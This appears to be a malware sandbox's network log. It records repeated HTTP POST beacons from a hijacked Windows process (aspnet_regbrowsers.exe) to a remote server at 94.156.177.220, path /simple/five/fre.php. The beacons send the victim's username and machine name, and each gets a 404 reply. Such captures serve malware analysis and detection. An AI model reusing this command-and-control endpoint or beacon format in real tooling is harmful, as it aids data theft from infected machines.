Oct 25, 2024 19:52:12.493413925 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 19:52:12.508411884 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 25, 2024 19:52:13.456581116 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 17:52:13 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.22	49194	94.156.177.220	80	3900	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 19:52:13.967932940 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 19:52:13.973613024 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 25, 2024 19:52:14.950884104 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 17:52:14 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.22	49195	94.156.177.220	80	3900	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 19:52:15.119479895 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 19:52:15.125319004 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 25, 2024 19:52:16.081203938 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 17:52:15 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.22	49196	94.156.177.220	80	3900	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 19:52:16.236784935 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 19:52:16.242299080 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 25, 2024 19:52:17.296941042 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 17:52:17 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.22	49197	94.156.177.220	80	3900	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 19:52:17.446836948 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 19:52:17.452451944 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 25, 2024 19:52:18.438119888 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 17:52:18 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.22	49198	94.156.177.220	80	3900	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 19:52:18.583517075 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 19:52:18.588953018 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 25, 2024 19:52:19.554600954 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 17:52:19 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.22	49199	94.156.177.220	80	3900	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 19:52:19.690922976 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 19:52:19.696573019 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 25, 2024 19:52:20.718924046 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 17:52:20 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.22	49200	94.156.177.220	80	3900	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 19:52:20.859158039 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 19:52:20.864617109 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 25, 2024 19:52:21.835601091 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 17:52:21 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.22	49201	94.156.177.220	80	3900	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 19:52:21.991240025 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 19:52:21.996702909 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 25, 2024 19:52:22.952907085 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 17:52:22 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.22	49202	94.156.177.220	80	3900	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 19:52:23.137924910 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 19:52:23.143979073 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 25, 2024 19:52:24.369417906 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 17:52:23 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.22	49203	94.156.177.220	80	3900	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 19:52:24.533739090 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 19:52:24.540107965 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 25, 2024 19:52:25.509913921 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 17:52:25 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.22	49204	94.156.177.220	80	3900	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 19:52:25.733125925 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 19:52:25.739974022 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 25, 2024 19:52:26.666554928 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 17:52:26 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.22	49205	94.156.177.220	80	3900	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 19:52:26.825233936 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 19:52:26.830845118 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 25, 2024 19:52:27.798177958 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 17:52:27 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.22	49206	94.156.177.220	80	3900	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 19:52:27.954771996 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 19:52:27.960200071 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 25, 2024 19:52:28.944343090 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 17:52:28 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.22	49207	94.156.177.220	80	3900	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 19:52:29.084017992 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 19:52:29.089464903 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 25, 2024 19:52:30.087476015 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 17:52:29 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port
38	192.168.2.22	49208	94.156.177.220	80

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 19:52:30.233679056 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 19:52:30.239135981 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 25, 2024 19:52:31.199507952 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 17:52:31 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port
39	192.168.2.22	49209	94.156.177.220	80

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 19:52:31.343420982 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 19:52:31.348968029 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 25, 2024 19:52:32.292700052 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 17:52:32 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port
40	192.168.2.22	49210	94.156.177.220	80

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 19:52:32.434194088 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 19:52:32.440484047 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 25, 2024 19:52:33.403844118 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 17:52:33 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port
41	192.168.2.22	49211	94.156.177.220	80

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 19:52:33.544646025 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 19:52:33.550208092 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 25, 2024 19:52:34.518452883 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 17:52:34 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port
42	192.168.2.22	49212	94.156.177.220	80

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 19:52:34.673525095 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 19:52:34.679063082 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 25, 2024 19:52:35.658840895 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 17:52:35 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port
43	192.168.2.22	49213	94.156.177.220	80

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 19:52:36.579443932 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 19:52:36.585141897 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
